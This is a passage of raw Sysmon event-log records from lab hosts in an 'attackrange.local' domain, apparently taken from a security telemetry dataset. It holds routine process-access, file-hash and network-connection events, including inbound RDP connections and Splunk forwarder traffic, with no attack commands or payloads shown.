Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051888Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:46.007{5EBD8912-8C76-6151-677A-00000000FC01}6592C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051887Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:46.021{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49FDF1C54A333BB057B3E9657A8C306E,SHA256=3331C159CF5BF0833C478AA8095D46419573961EF82B0D02AC1A1B75E171186B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980268Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:47.804{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=158338C63D16A2C6ADAAF05BF008CA9C,SHA256=844FC0ABE334751D7A20E20B240AD6C36A75E29832A5F9D9CA4B82D455709D93,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051915Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:47.803{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051914Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:47.803{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051913Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:47.772{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051912Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:47.772{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051911Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:47.772{5EBD8912-79C0-6151-E577-00000000FC01}42967048C:\Windows\Explorer.EXE{5EBD8912-85DC-6151-8B79-00000000FC01}4220C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051910Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:47.772{5EBD8912-79C0-6151-E577-00000000FC01}42967048C:\Windows\Explorer.EXE{5EBD8912-85DC-6151-8B79-00000000FC01}4220C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051909Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:47.772{5EBD8912-79C0-6151-E577-00000000FC01}42967048C:\Windows\Explorer.EXE{5EBD8912-85DC-6151-8B79-00000000FC01}4220C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051908Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:47.756{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-85DC-6151-8C79-00000000FC01}32C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051907Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:47.756{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-85DC-6151-8C79-00000000FC01}32C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051906Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:47.756{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-85DC-6151-8C79-00000000FC01}32C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051905Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:47.756{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-85DC-6151-8C79-00000000FC01}32C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051904Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:47.042{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC320914243122DEA94B9ECD777C9242,SHA256=3AFC273F7AB5B3E1A4F936A40ECD0745BCC8FB31573ACB6694CA6FC28B149189,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980267Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:44.770{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59467-false10.0.1.12-8000- 354300x8000000000000000980266Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:44.367{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-64186-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980265Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:47.335{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8CEEE108569F10E7B79D51B207128CDA,SHA256=49ECA6B5A0CDDCC3521DE47F142A49259108F8BBF2E18BE81A94F365312E2B9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980264Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:47.335{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E95B9010C5E244628E5B8C360FF93748,SHA256=D2FD470A7C97B50A9FCBC67273B235BA4FFFC85EB9F51C0BE2EFE95E37BB9CE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051903Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:47.020{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D89491698E2E099F04D4047DE42A627E,SHA256=1920F56D074627FADBD2AA9853E111A9893A8C09E36F65A5A4692CC70BC7300F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051921Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:48.918{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+a0d439|C:\Program Files\Mozilla Firefox\xul.dll+a0d35a|C:\Program Files\Mozilla Firefox\xul.dll+a0cf49|C:\Program Files\Mozilla Firefox\xul.dll+a090df|C:\Program Files\Mozilla Firefox\xul.dll+a093ec|C:\Program Files\Mozilla Firefox\xul.dll+b55c5a|C:\Program Files\Mozilla Firefox\xul.dll+2d9649|C:\Program Files\Mozilla Firefox\xul.dll+2d9554|C:\Program Files\Mozilla Firefox\xul.dll+2d933d|C:\Program Files\Mozilla Firefox\xul.dll+2d91d4|C:\Program Files\Mozilla Firefox\xul.dll+ba1993|C:\Program Files\Mozilla Firefox\xul.dll+ba2691|C:\Program Files\Mozilla Firefox\xul.dll+ba168d|C:\Program Files\Mozilla Firefox\xul.dll+ba15e2|C:\Program Files\Mozilla Firefox\xul.dll+b723b2|C:\Program Files\Mozilla Firefox\xul.dll+1a1b580|C:\Program Files\Mozilla Firefox\xul.dll+b78344|C:\Program Files\Mozilla Firefox\xul.dll+fca4c4|C:\Program Files\Mozilla Firefox\xul.dll+f36457|C:\Program Files\Mozilla Firefox\xul.dll+2cbfda 10341000x80000000000000001051920Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:48.834{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+a0d439|C:\Program Files\Mozilla Firefox\xul.dll+a0d35a|C:\Program Files\Mozilla Firefox\xul.dll+a0cf49|C:\Program Files\Mozilla Firefox\xul.dll+a090df|C:\Program Files\Mozilla Firefox\xul.dll+a093ec|C:\Program Files\Mozilla Firefox\xul.dll+b55c5a|C:\Program Files\Mozilla Firefox\xul.dll+2d9649|C:\Program Files\Mozilla Firefox\xul.dll+2d9554|C:\Program Files\Mozilla Firefox\xul.dll+2d933d|C:\Program Files\Mozilla Firefox\xul.dll+2d91d4|C:\Program Files\Mozilla Firefox\xul.dll+ba1993|C:\Program Files\Mozilla Firefox\xul.dll+ba2691|C:\Program Files\Mozilla Firefox\xul.dll+ba168d|C:\Program Files\Mozilla Firefox\xul.dll+ba15e2|C:\Program Files\Mozilla Firefox\xul.dll+b723b2|C:\Program Files\Mozilla Firefox\xul.dll+1a1b580|C:\Program Files\Mozilla Firefox\xul.dll+b78344|C:\Program Files\Mozilla Firefox\xul.dll+fca4c4|C:\Program Files\Mozilla Firefox\xul.dll+f36457|C:\Program Files\Mozilla Firefox\xul.dll+2cbfda 354300x80000000000000001051919Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:46.852{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53481-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local445microsoft-ds 354300x80000000000000001051918Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:46.851{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53481-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local445microsoft-ds 354300x80000000000000001051917Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:46.527{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse103.24.1.102-58524-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051916Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:48.056{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF512BA0107AD26543FC081060E998B5,SHA256=533833C1BEF6925D923B9B4B3DED009A63390FFEA00233619F544D148957D385,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980271Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:46.003{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-65276-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000980270Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:45.837{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59815-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980269Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:48.522{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8CEEE108569F10E7B79D51B207128CDA,SHA256=49ECA6B5A0CDDCC3521DE47F142A49259108F8BBF2E18BE81A94F365312E2B9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980272Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:49.022{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56793F6FC78150E32330FD9237B60C80,SHA256=1A1CF821BA889CA09C1C8432D2DA3218C78587ABAC7113A339B16E87361C1DBB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051924Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:47.847{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53482-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001051923Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:47.714{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49239-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051922Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:49.087{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F5F3DF7DC93A41DE23CC976AF2B463B,SHA256=F984C74E7D3BB9A266D964843A7B4A5875030A143A6750F31B8E10794AF2AD84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980273Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:50.257{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E235143E6C098BEFB0B54F2D189E6492,SHA256=990D006E8B96697C081B3389B493A55B02BD63AD50E2AA91089693BE5A6A36CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051926Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:50.870{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=708CDFF7CB75E60A16402CA805288BA0,SHA256=9ABBBEFD67062F065075D3110DCFEF860E2E123D533F265FE5ED70AEA9948270,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051925Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:50.118{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4B41C5A7050672C4560E46AC950A188,SHA256=73F69D5A54669804AD0518E344BA387379D807231F180DF48DE31E009E589B73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980276Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:51.882{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C345A85D9BF48E7A972835B1A217528A,SHA256=7C222FA2F5A157820352D7999B4FED22B50B06E036CB9B5DC19AAB6CD663A900,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980275Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:49.106{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-55912-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980274Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:51.366{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC783E72E396FD5D954FB44C0AA3CF3B,SHA256=449FAB029E3BD034C049DA8A39AEDE3C30E39D62B65631109745557F22F06B7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051927Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:51.137{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEDAAD1C65616D273986B3CA7A8DFC46,SHA256=5336842C9E34C79A71E0F51C563745D93061FB427FA035F36489CE6534F02EDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980277Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:52.397{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EEB6ED5B6F91A7293B8F07D68052FF3,SHA256=F7B50381695B94BE0B3BB7BB2C96B4623A5CD645308F28ED9C33AA46F0074C99,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051944Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:52.986{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+bee203|C:\Program Files\Mozilla Firefox\xul.dll+bed8a1|C:\Program Files\Mozilla Firefox\xul.dll+be54a3|C:\Program Files\Mozilla Firefox\xul.dll+beec50|C:\Program Files\Mozilla Firefox\xul.dll+faf709|C:\Program Files\Mozilla Firefox\xul.dll+1a1b54f|C:\Program Files\Mozilla Firefox\xul.dll+b78344|C:\Program Files\Mozilla Firefox\xul.dll+fca4c4|C:\Program Files\Mozilla Firefox\xul.dll+f36457|C:\Program Files\Mozilla Firefox\xul.dll+2cbfda|C:\Program Files\Mozilla Firefox\xul.dll+ea7e38|C:\Program Files\Mozilla Firefox\xul.dll+ea7972|C:\Program Files\Mozilla 